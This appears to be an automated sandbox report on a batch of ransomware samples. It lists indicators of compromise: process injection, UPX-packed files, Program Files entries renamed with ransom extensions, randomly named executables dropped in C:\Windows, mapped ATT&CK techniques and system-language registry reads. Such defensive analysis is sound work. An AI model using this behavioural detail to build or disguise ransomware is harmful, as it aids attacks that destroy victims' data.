PID 4324 set thread context of 9072	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	471
PID 1776 set thread context of 11128	1776	tpvpyme.exe	475
PID 4324 set thread context of 6268	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	477
PID 4324 set thread context of 11236	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	479
PID 4324 set thread context of 7676	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	481
PID 4324 set thread context of 724	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	483
PID 4324 set thread context of 6680	4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe	485

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0009000000023bcd-99.dat	upx
behavioral1/memory/4904-101-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/files/0x0009000000023bcf-106.dat	upx
behavioral1/memory/1408-110-0x0000000000400000-0x0000000000452000-memory.dmp	upx
behavioral1/memory/4904-160-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral1/files/0x0008000000023bdb-167.dat	upx
behavioral1/memory/2004-168-0x0000000000400000-0x0000000000611000-memory.dmp	upx
behavioral1/memory/2004-389-0x0000000000400000-0x0000000000611000-memory.dmp	upx
behavioral1/memory/2004-968-0x0000000000400000-0x0000000000611000-memory.dmp	upx
behavioral1/memory/2004-8840-0x0000000000400000-0x0000000000611000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-fibers-l1-1-0.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ORGCHART.CHM	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.Emit.Lightweight.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\WindowsFormsIntegration.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-125_contrast-black.png	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wns_push_client.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\System.Windows.Forms.Design.resources.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-pl.xrm-ms.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\OnlineMediaComponent.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\logo.scale-200_contrast-black.png	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Services.Client.resources.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.Cryptography.Cng.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-timezone-l1-1-0.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Private.Xml.Linq.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-125_contrast-white.png	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\TimerWideTile.contrast-white_scale-200.png	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGM.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-125_contrast-white.png	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Xaml.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ul-phn.xrm-ms.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\System\msvcp140_1.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview.png.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.FileUtils.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\ui-strings.js.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\jvmti.h	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxCalendar.App.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\Java\jdk-1.8\lib\ir.idl.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\THMBNAIL.PNG.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleAppAssets\Videos\people_fre_motionAsset_p2.mp4	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOHEV.DLL	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Console.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Configuration.ConfigurationManager.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SFMESSAGES.XML.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\PresentationFramework-SystemXmlLinq.dll	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\MatchExactly.ps1	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\PresentationCore.resources.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-7E980581.[[email protected]].bot	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OLKFSTUB.DLL.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextDark.scale-125.png	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe

Drops file in Windows directory 40 IoCs

description	ioc	Process
File opened for modification	C:\Windows\zryqncncriuikukh.exe	lurwhzlcveb.exe
File created	C:\Windows\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File opened for modification	C:\Windows\avfaasgyqkzqvibbvue.exe	ajhqekm.exe
File created	C:\Windows\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj	ajhqekm.exe
File opened for modification	C:\Windows\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File created	C:\Windows\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File created	C:\Windows\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File opened for modification	C:\Windows\zryqncncriuikukh.exe	ajhqekm.exe
File opened for modification	C:\Windows\zryqncncriuikukh.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\gzhayoaqgyladofdv.exe	ajhqekm.exe
File opened for modification	C:\Windows\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj	ajhqekm.exe
File created	C:\Windows\zryqncncriuikukh.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File created	C:\Windows\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\czlikeuoievovkfhdeqnz.exe	lurwhzlcveb.exe
File created	C:\Windows\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\zryqncncriuikukh.exe	ajhqekm.exe
File opened for modification	C:\Windows\gzhayoaqgyladofdv.exe	ajhqekm.exe
File opened for modification	C:\Windows\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File opened for modification	C:\Windows\pjsmlcpgxqeuykcbus.exe	ajhqekm.exe
File opened for modification	C:\Windows\njuqrkzslgwouicdyyjf.exe	ajhqekm.exe
File opened for modification	C:\Windows\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File created	C:\Windows\haveafun.dll	Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
File opened for modification	C:\Windows\gzhayoaqgyladofdv.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\njuqrkzslgwouicdyyjf.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File opened for modification	C:\Windows\trecfarmhewqyoknkmzxki.exe	ajhqekm.exe
File opened for modification	C:\Windows\hleirspqrussgcenqyrvosbc.abe	ajhqekm.exe
File created	C:\Windows\avfaasgyqkzqvibbvue.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\czlikeuoievovkfhdeqnz.exe	ajhqekm.exe
File created	C:\Windows\hleirspqrussgcenqyrvosbc.abe	ajhqekm.exe
File opened for modification	C:\Windows\pjsmlcpgxqeuykcbus.exe	lurwhzlcveb.exe
File opened for modification	C:\Windows\trecfarmhewqyoknkmzxki.exe	lurwhzlcveb.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
3828	1408	WerFault.exe	114
3520	4412	WerFault.exe	137
4228	4412	WerFault.exe	137
2684	4412	WerFault.exe	137
1692	5072	WerFault.exe	154
860	4412	WerFault.exe	137
2256	4412	WerFault.exe	137
4384	4412	WerFault.exe	137
1112	4412	WerFault.exe	137
280	1396	WerFault.exe	180
5572	4412	WerFault.exe	137
5772	1396	WerFault.exe	180
5924	4412	WerFault.exe	137
5940	1396	WerFault.exe	180
6008	4412	WerFault.exe	137
6108	1396	WerFault.exe	180
3884	4412	WerFault.exe	137
2404	1396	WerFault.exe	180
5128	4412	WerFault.exe	137
1400	1396	WerFault.exe	180
5808	1396	WerFault.exe	180
5588	4412	WerFault.exe	137
5380	2864	WerFault.exe	175
5800	4412	WerFault.exe	137
6456	1396	WerFault.exe	180
6700	4412	WerFault.exe	137
6984	1396	WerFault.exe	180
6108	4412	WerFault.exe	137
8668	4412	WerFault.exe	137
7780	1396	WerFault.exe	180
6456	1396	WerFault.exe	180
5392	4412	WerFault.exe	137
9256	1396	WerFault.exe	180
1940	4412	WerFault.exe	137
7940	1396	WerFault.exe	180
2672	4412	WerFault.exe	137
11004	1396	WerFault.exe	180
6704	4412	WerFault.exe	137
8928	1396	WerFault.exe	180
7988	4412	WerFault.exe	137
9244	4412	WerFault.exe	137
5840	1396	WerFault.exe	180
9224	9200	WerFault.exe	301
10904	4412	WerFault.exe	137
5776	9200	WerFault.exe	301
8904	4412	WerFault.exe	137
7348	9200	WerFault.exe	301
5448	4412	WerFault.exe	137
6924	9200	WerFault.exe	301
9700	4412	WerFault.exe	137
10336	9200	WerFault.exe	301
11148	4412	WerFault.exe	137
8356	9200	WerFault.exe	301
856	4412	WerFault.exe	137
7260	9200	WerFault.exe	301
8560	4412	WerFault.exe	137
5940	9200	WerFault.exe	301
6872	4412	WerFault.exe	137
5600	9200	WerFault.exe	301
6888	4412	WerFault.exe	137
8008	9200	WerFault.exe	301
8680	4412	WerFault.exe	137
8128	9200	WerFault.exe	301
6188	4412	WerFault.exe	137

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Sunwin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
